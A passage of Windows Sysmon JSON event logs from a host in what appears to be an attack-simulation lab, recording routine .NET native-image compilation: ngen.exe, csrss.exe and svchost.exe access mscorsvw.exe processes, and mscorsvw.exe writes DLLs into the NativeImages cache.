C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:11.914","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21FB-5F25-0000-00105BB50A00}","TargetProcessId":"4936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6747,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:04:12.539\r\nProcessGuid: {41C8662E-21FB-5F25-0000-00105BB50A00}\r\nProcessId: 4936\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1348-0\\System.Runtime.WindowsRuntime.dll\r\nCreationUtcTime: 2020-08-01 08:04:12.539","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:04:12.539","ProcessGuid":"{41C8662E-21FB-5F25-0000-00105BB50A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1348-0\\System.Runtime.WindowsRuntime.dll","CreationUtcTime":"2020-08-01 08:04:12.539","EventReceivedTime":"2020-08-01 08:04:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6748,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:12.586\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21FC-5F25-0000-0010C7B90A00}\r\nTargetProcessId: 3884\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:12.586","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21FC-5F25-0000-0010C7B90A00}","TargetProcessId":"3884","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6749,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:12.586\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21FC-5F25-0000-0010C7B90A00}\r\nTargetProcessId: 3884\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:12.586","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21FC-5F25-0000-0010C7B90A00}","TargetProcessId":"3884","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6750,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:12.601\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21FC-5F25-0000-0010C7B90A00}\r\nTargetProcessId: 3884\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:12.601","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21FC-5F25-0000-0010C7B90A00}","TargetProcessId":"3884","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6751,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:12.632\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21FC-5F25-0000-0010FABC0A00}\r\nTargetProcessId: 892\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:12.632","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21FC-5F25-0000-0010FABC0A00}","TargetProcessId":"892","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6752,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:12.632\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21FC-5F25-0000-0010FABC0A00}\r\nTargetProcessId: 892\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:12.632","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21FC-5F25-0000-0010FABC0A00}","TargetProcessId":"892","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6753,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:12.632\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21FC-5F25-0000-0010FABC0A00}\r\nTargetProcessId: 892\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:12.632","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21FC-5F25-0000-0010FABC0A00}","TargetProcessId":"892","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6754,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:04:12.711\r\nProcessGuid: {41C8662E-21FC-5F25-0000-0010FABC0A00}\r\nProcessId: 892\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\37c-0\\System.Runtime.WindowsRuntime.UI.Xaml.dll\r\nCreationUtcTime: 2020-08-01 08:04:12.711","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:04:12.711","ProcessGuid":"{41C8662E-21FC-5F25-0000-0010FABC0A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\37c-0\\System.Runtime.WindowsRuntime.UI.Xaml.dll","CreationUtcTime":"2020-08-01 08:04:12.711","EventReceivedTime":"2020-08-01 08:04:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6755,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:12.742\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21FC-5F25-0000-001080C00A00}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsof